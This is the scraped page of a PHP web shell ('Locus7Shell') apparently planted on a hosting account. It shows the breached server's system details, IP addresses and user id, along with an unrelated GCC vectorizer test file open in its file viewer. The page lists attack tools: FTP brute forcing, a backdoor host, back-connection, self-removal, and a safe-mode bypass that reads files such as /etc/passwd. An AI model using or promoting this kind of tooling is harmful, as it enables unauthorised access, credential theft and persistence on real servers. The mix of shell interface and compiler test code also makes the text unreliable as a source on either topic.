Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/gcc.dg/vect/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     bb-slp-pr65935.c (1.72 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* { dg-additional-options "-O3" } */
/* { dg-require-effective-target vect_double } */
/* { dg-additional-options "-mprefer-vector-width=128" { target x86_64-*-* i?86-*-* } } */

#include "tree-vect.h"

extern void abort (void);
extern void *malloc (__SIZE_TYPE__);

struct site {
    struct {
    struct {
        double real;
        double imag;
    } e[3][3];
    } link[32];
    double phase[32];
} *lattice;
int sites_on_node;

void rephase (void)
{
  int i,j,k,dir;
  struct site *s;
  for(i=0,s=lattice;i<sites_on_node;i++,s++)
    for(dir=0;dir<32;dir++)
      for(j=0;j<3;j++)for(k=0;k<3;k++)
    {
      s->link[dir].e[j][k].real *= s->phase[dir];
      s->link[dir].e[j][k].imag *= s->phase[dir];
    }
}

int main()
{
  int i,j,k;
  check_vect ();
  sites_on_node = 1;
  lattice = malloc (sizeof (struct site) * sites_on_node);
  for (i = 0; i < 32; ++i)
    {
      lattice->phase[i] = i;
      for (j = 0; j < 3; ++j)
    for (k = 0; k < 3; ++k)
      {
        lattice->link[i].e[j][k].real = 1.0;
        lattice->link[i].e[j][k].imag = 1.0;
        __asm__ volatile ("" : : : "memory");
      }
    }
  rephase ();
  for (i = 0; i < 32; ++i)
    for (j = 0; j < 3; ++j)
      for (k = 0; k < 3; ++k)
    if (lattice->link[i].e[j][k].real != i
        || lattice->link[i].e[j][k].imag != i)
      abort ();
  return 0;
}

/* We should also be able to use 2-lane SLP to initialize the real and
   imaginary components in the first loop of main.  */
/* { dg-final { scan-tree-dump-times "optimized: basic block" 10 "slp1" } } */
/* We should see the s->phase[dir] operand splatted and no other operand built
   from scalars.  See PR97334.  */
/* { dg-final { scan-tree-dump "Using a splat" "slp1" } } */
/* { dg-final { scan-tree-dump-times "Building vector operands from scalars" 0 "slp1" } } */

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0075 ]--